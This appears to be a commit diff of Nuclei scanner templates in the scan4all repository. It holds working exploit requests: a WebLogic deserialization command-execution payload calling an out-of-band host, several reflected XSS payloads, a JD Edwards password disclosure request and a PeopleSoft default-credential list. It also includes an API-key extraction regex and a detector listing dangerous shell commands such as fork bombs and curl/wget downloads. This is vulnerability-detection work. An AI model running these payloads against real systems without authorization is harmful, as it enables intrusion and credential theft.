STRLCPY/scan4all

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-10271.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Oracle WebLogic Server - Remote Command Execution
5		-	author: dr_set,ImNightmaree
	5	+	author: dr_set,ImNightmaree,true13
6	6		severity: high
7	7		description: \|
8	8		The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
		skipped 33 lines
42	42		<string>-c</string>
43	43		</void>
44	44		<void index="2">
45		-	<string>interact.sh</string>
	45	+	<string>ping -c 1 {{interactsh-url}}</string>
46	46		</void>
47	47		</array>
48	48		<void method="start"/></void>
		skipped 36 lines
85	85		matchers:
86	86		- type: dsl
87	87		dsl:
88		-	- regex("<faultstring>.*</faultstring>", body)
	88	+	- regex("<faultstring>java.lang.ProcessBuilder \|\| <faultstring>0", body)
	89	+	- contains(interactsh_protocol, "dns")
89	90		- status_code == 500
90	91		condition: and
91	92
		skipped 8 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-8917.yaml

1	1		id: CVE-2017-8917
2	2
3	3		info:
4		-	name: Joomla! <3.7.1 - SQL Injection
	4	+	name: Joomla! < 3.7.1 - SQL Injection
5	5		author: princechaddha
6	6		severity: critical
7	7		description: \|
8	8		Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors.
9	9		reference:
10		-	- https://www.cvedetails.com/cve/CVE-2017-8917/
11	10		- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
12	11		- http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515
13	12		- http://web.archive.org/web/20211207050608/https://securitytracker.com/id/1038522
	13	+	- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
14	14		classification:
15	15		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	16		cvss-score: 9.8
17	17		cve-id: CVE-2017-8917
18	18		cwe-id: CWE-89
	19	+	metadata:
	20	+	shodan-query: http.component:"Joomla"
	21	+	verified: "true"
19	22		tags: cve,cve2017,joomla,sqli
20	23
21	24		variables:
		skipped 8 lines
30	33		- type: word
31	34		part: body
32	35		words:
33		-	- '{{md5({{num}})}}'
34		-
35		-	# Enhanced by mp on 2022/05/11
	36	+	- '{{md5(num)}}'
36	37

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-2733.yaml

1	+	id: CVE-2020-2733
2	+
3	+	info:
4	+	name: JD Edwards EnterpriseOne Tools - Admin Password Disclosure
5	+	author: DhiyaneshDk,pussycat0x
6	+	severity: critical
7	+	description: \|
8	+	Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
9	+	reference:
10	+	- https://redrays.io/cve-2020-2733-jd-edwards/
11	+	- https://www.oracle.com/security-alerts/cpuapr2020.html
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2020-2733
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15	+	cvss-score: 9.8
16	+	cve-id: CVE-2020-2733
17	+	metadata:
18	+	shodan-query: port:8999 product:"Oracle WebLogic Server"
19	+	verified: "true"
20	+	tags: cve,cve2020,oracle,weblogic,disclosure,exposure
21	+
22	+	requests:
23	+	- method: GET
24	+	path:
25	+	- '{{BaseURL}}/manage/fileDownloader?sec=1'
26	+
27	+	matchers-condition: and
28	+	matchers:
29	+	- type: word
30	+	part: body
31	+	words:
32	+	- 'ACHCJK'
33	+
34	+	- type: word
35	+	part: header
36	+	words:
37	+	- "text/plain"
38	+
39	+	- type: status
40	+	status:
41	+	- 200
42	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-39320.yaml

1	1		id: CVE-2021-39320
2	2
3	3		info:
4		-	name: WordPress underConstruction Plugin< 1.19 - Cross-Site Scripting
	4	+	name: WordPress underConstruction Plugin < 1.19 - Cross-Site Scripting
5	5		author: dhiyaneshDK
6	6		severity: medium
7		-	description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
	7	+	description: \|
	8	+	The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
8	9		reference:
9	10		- https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
	11	+	- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320
10	12		- https://nvd.nist.gov/vuln/detail/CVE-2021-39320
11		-	- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320
12	13		classification:
13	14		cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	15		cvss-score: 6.1
15	16		cve-id: CVE-2021-39320
16	17		cwe-id: CWE-79
17		-	tags: wordpress,xss,cve,cve2021,wp-plugin,wpscan
	18	+	metadata:
	19	+	verified: true
	20	+	tags: cve,cve2021,wp-plugin,wpscan,wordpress,wp,xss,authenticated
18	21
19	22		requests:
20		-	- method: GET
21		-	path:
22		-	- '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction'
	23	+	- raw:
	24	+	- \|
	25	+	POST /wp-login.php HTTP/1.1
	26	+	Host: {{Hostname}}
	27	+	Content-Type: application/x-www-form-urlencoded
23	28
	29	+	log={{username}}&pwd={{password}}&wp-submit=Log+In
	30	+
	31	+	- \|
	32	+	GET /wp-admin/admin.php/"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1
	33	+	Host: {{Hostname}}
	34	+
	35	+	cookie-reuse: true
24	36		matchers-condition: and
25	37		matchers:
26	38		- type: word
27	39		part: body
28	40		words:
29		-	- '</script><script>alert(document.domain)</script>'
	41	+	- 'action="/wp-admin/admin.php/"><script>alert(document.domain)</script>'
	42	+	- 'under-construction'
	43	+	condition: and
30	44
31	45		- type: word
32	46		part: header
		skipped 4 lines
37	51		status:
38	52		- 200
39	53
40		-	# Enhanced by mp on 2022/03/23
41		-

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-41878.yaml

		skipped 3 lines
4	4		name: i-Panel Administration System - Cross-Site Scripting
5	5		author: madrobot
6	6		severity: medium
7		-	description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
	7	+	description: \|
	8	+	A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
8	9		reference:
9		-	- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
10	10		- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
11		-	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
	11	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
	12	+	- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878
12	13		classification:
13	14		cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	15		cvss-score: 6.1
15	16		cve-id: CVE-2021-41878
16	17		cwe-id: CWE-79
17		-	tags: cve,cve2021,justwriting,xss
	18	+	metadata:
	19	+	verified: "true"
	20	+	tags: cve,cve2021,ipanel,xss
18	21
19	22		requests:
20	23		- method: GET
21	24		path:
22		-	- '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
	25	+	- '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E'
23	26
24	27		matchers-condition: and
25	28		matchers:
26		-	- type: status
27		-	status:
28		-	- 200
29		-
30	29		- type: word
	30	+	part: body
31	31		words:
32		-	- "</script><script>alert(document.domain)</script>"
33		-	part: body
	32	+	- '><img src=a onerror=alert("document.domain")>'
	33	+	- 'i-Panel Administration'
	34	+	condition: and
34	35
35	36		- type: word
	37	+	part: header
36	38		words:
37	39		- "text/html"
38		-	part: header
39	40
40		-	# Enhanced by mp on 2022/02/27
	41	+	- type: status
	42	+	status:
	43	+	- 200
41	44

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-31373.yaml

1	1		id: CVE-2022-31373
2	2
3	3		info:
4		-	name: SolarView Compact 6.00 - Cross-Site Scripting
	4	+	name: SolarView Compact 6.00 - Cross-Site Scripting(XSS)
5	5		author: ritikchaddha
6	6		severity: medium
7	7		description: \|
8		-	SolarView Compact 6.00 contains a cross-site scripting vulnerability via the Solar_AiConf.php component.
	8	+	SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php.
9	9		reference:
10	10		- https://github.com/badboycxcc/SolarView_Compact_6.0_xss
11	11		- https://nvd.nist.gov/vuln/detail/CVE-2022-31373
		skipped 18 lines
30	30		part: body
31	31		words:
32	32		- '/Solar_AiConf.php/"><script>alert(document.domain)</script>'
	33	+	- 'HREF="Solar_Service.php"'
	34	+	condition: and
33	35
34	36		- type: word
35	37		part: header
		skipped 4 lines
40	42		status:
41	43		- 200
42	44
43		-	# Enhanced by mp on 2022/09/14
44		-

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-35405.yaml

		skipped 43 lines
44	44
45	45		<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
46	46
	47	+	stop-at-first-match: true
47	48		matchers:
48	49		- type: word
49	50		part: body
50	51		words:
51		-	- "faultString"
	52	+	- "<name>faultString</name>"
52	53		- "No such service [ProjectDiscovery]"
53		-	- "methodResponse"
	54	+	condition: or
	55	+
	56	+	- type: word
	57	+	part: body
	58	+	words:
	59	+	- "<methodResponse>"
	60	+	- "</methodResponse>"
54	61		condition: or
55	62

■ ■ ■ ■ ■ ■

config/nuclei-templates/default-logins/oracle/peoplesoft-default-login.yaml

1	+	id: peoplesoft-default-login
2	+
3	+	info:
4	+	name: Oracle PeopleSoft Default Login
5	+	author: LogicalHunter
6	+	severity: high
7	+	description: Oracle peoplesoft default admin credentials were discovered.
8	+	reference:
9	+	- https://www.oracle.com/applications/peoplesoft/
10	+	- https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
11	+	classification:
12	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
13	+	cvss-score: 8.3
14	+	cwe-id: CWE-522
15	+	metadata:
16	+	verified: true
17	+	shodan-query: title:"Oracle PeopleSoft Sign-in"
18	+	tags: default-login,peoplesoft,oracle,fuzz
19	+
20	+	requests:
21	+	- method: POST
22	+	path:
23	+	- "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
24	+	- "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
25	+	- "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
26	+	- "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
27	+	- "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
28	+	- "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
29	+	- "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
30	+	- "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
31	+	- "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
32	+	- "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
33	+	- "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
34	+	- "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
35	+	- "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
36	+	- "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
37	+	- "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
38	+	- "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
39	+	- "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
40	+	- "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
41	+	- "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
42	+	- "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"
43	+
44	+	body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"
45	+	headers:
46	+	Content-Type: application/x-www-form-urlencoded
47	+
48	+	attack: pitchfork
49	+	payloads:
50	+	username:
51	+	- PS
52	+	- VP1
53	+	- PSADMIN
54	+	- PSEM
55	+	- PSHC
56	+	- PSCR
57	+	- HFG
58	+	- PSPY
59	+	- HHR_JPM
60	+	- HHR_CMP
61	+	password:
62	+	- PS
63	+	- VP1
64	+	- PSADMIN
65	+	- PSEM
66	+	- PSHC
67	+	- PSCR
68	+	- HFG
69	+	- PSPY
70	+	- HHR_JPM
71	+	- HHR_CMP
72	+
73	+	stop-at-first-match: true
74	+	matchers-condition: and
75	+	matchers:
76	+	- type: word
77	+	part: header
78	+	words:
79	+	- 'Set-Cookie: PS_TOKEN='
80	+
81	+	- type: status
82	+	status:
83	+	- 302
84	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/oracle-business-intelligence.yaml

1	+	id: oracle-business-intelligence
2	+
3	+	info:
4	+	name: Oracle Business Intelligence Sign In
5	+	author: DhiyaneshDk
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.title:"Oracle Business Intelligence Sign In"
10	+	tags: panel,oracle
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- "{{BaseURL}}/saw.dll?bieehome&startPage=1"
16	+
17	+	matchers-condition: and
18	+	matchers:
19	+	- type: word
20	+	part: body
21	+	words:
22	+	- "<title>Oracle Business Intelligence Sign In</title>"
23	+
24	+	- type: status
25	+	status:
26	+	- 200
27	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/workspace-one-uem.yaml

1	1		id: workspace-one-uem
2	2
3	3		info:
4		-	name: Workspace ONE UEM AirWatch Login Page
5		-	author: gevakun
	4	+	name: Vmware Workspace ONE UEM AirWatch Login Panel
	5	+	author: gevakun,hanlaomo
6	6		severity: info
7	7		reference:
8	8		- https://twitter.com/Jhaddix/status/1295861505963909120
9		-	tags: panel,workspaceone,login
	9	+	metadata:
	10	+	verified: true
	11	+	shodan-query: http.html:"Airwatch"
	12	+	tags: panel,workspaceone,vmware
10	13
11	14		requests:
12	15		- method: GET
13	16		path:
14	17		- "{{BaseURL}}/AirWatch/Login"
	18	+
15	19		matchers:
16	20		- type: word
	21	+	part: body
17	22		words:
18	23		- "About VMware AirWatch"
19		-	part: body
	24	+	- 'content="AirWatch'
	25	+	- "/AirWatch/Images"
	26	+	condition: or
20	27

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/files/sendgrid-env.yaml

1	+	id: sendgrid-env
2	+
3	+	info:
4	+	name: SendGrid Env File Exposure
5	+	author: DhiyaneshDk
6	+	severity: medium
7	+	metadata:
8	+	verified: true
9	+	shodan-query: html:"sendgrid.env"
10	+	tags: exposure,sendgrid,key,api
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- "{{BaseURL}}/sendgrid.env"
16	+
17	+	extractors:
18	+	- type: regex
19	+	part: body
20	+	regex:
21	+	- 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'
22	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/file/bash/bash.yaml

1	+	id: bash-scanner
2	+
3	+	info:
4	+	name: Bash Scanner
5	+	author: ransomsec
6	+	severity: info
7	+	description: Indicator for bash Dangerous Commands – You Should Never Execute on Linux
8	+	reference:
9	+	- https://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/
10	+	- https://phoenixnap.com/kb/dangerous-linux-terminal-commands
11	+	tags: bash,shell,sh
12	+
13	+	file:
14	+	- extensions:
15	+	- sh
16	+
17	+	extractors:
18	+	- type: regex
19	+	name: fork-bomb
20	+	regex:
21	+	- ":(){:\|:&};:"
22	+
23	+	- type: regex
24	+	name: rm commad found
25	+	regex:
26	+	- "rm -(f\|r)"
27	+	- "rm -(fr\|rf)"
28	+
29	+	- type: regex
30	+	name: code injection
31	+	regex:
32	+	- "/bin/(sh\|bash) -"
33	+	- "eval"
34	+	- "echo -c"
35	+	- "/bin/(sh\|bash) -c"
36	+	- "(sh\|bash) -"
37	+	- "(sh\|bash) -c"
38	+
39	+	- type: regex
40	+	name: file manipulation
41	+	regex:
42	+	- "cat /dev/null >"
43	+
44	+	- type: regex
45	+	name: unknown filedownload
46	+	regex:
47	+	- '(wget\|curl) (https?\|ftp\|file)://[-A-Za-z0-9\+&@#/%?=~_\|!:,.;][-A-Za-z0-9\+&@#/%=~_\|]\.[-A-Za-z0-9\+&@#/%?=~_\|!:,.;][-A-Za-z0-9\+&@#/%=~_\|]$'
48	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/liferay/liferay-jsonws.yaml

		skipped 3 lines
4	4		name: Liferay /api/jsonws - API Exposed
5	5		author: DhiyaneshDk
6	6		severity: low
	7	+	reference:
	8	+	- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
	9	+	- https://liferay.dev/blogs/-/blogs/securing-the-api-jsonws-ui?_com_liferay_blogs_web_portlet_BlogsPortlet_showFlags=true&scroll=_com_liferay_blogs_web_portlet_BlogsPortlet_discussionContainer
7	10		metadata:
8	11		verified: true
9	12		shodan-query: title:"Liferay"
10		-	reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
11	13		tags: liferay,exposure,api
12	14
13	15		requests:
		skipped 20 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/proxy/open-proxy-localhost.yaml

1		-	id: open-proxy-http-portscan
	1	+	id: open-proxy-localhost
2	2
3	3		info:
4	4		name: Open Proxy to Other Web Ports via Proxy's localhost Interface
		skipped 60 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/xss-deprecated-header.yaml

1		-	id: xss-deprecated-header-detect
	1	+	id: xss-deprecated-header
2	2
3	3		info:
4	4		name: XSS-Protection Header - Cross-Site Scripting
		skipped 38 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/technologies/moveit-transfer-detect.yaml

1	+	id: moveit-transfer-detect
2	+
3	+	info:
4	+	name: Moveit File Transfer
5	+	author: tess
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: html:"human.aspx"
10	+	tags: tech,moveit
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- '{{BaseURL}}/human.aspx'
16	+
17	+	matchers-condition: and
18	+	matchers:
19	+	- type: word
20	+	part: body
21	+	words:
22	+	- 'stylesheet_MOVEit'
23	+	- 'moveit.transfer'
24	+	- 'MOVEitPopUp'
25	+	condition: or
26	+	case-insensitive: true
27	+
28	+	- type: status
29	+	status:
30	+	- 200
31	+

up PoCs 2022-09-23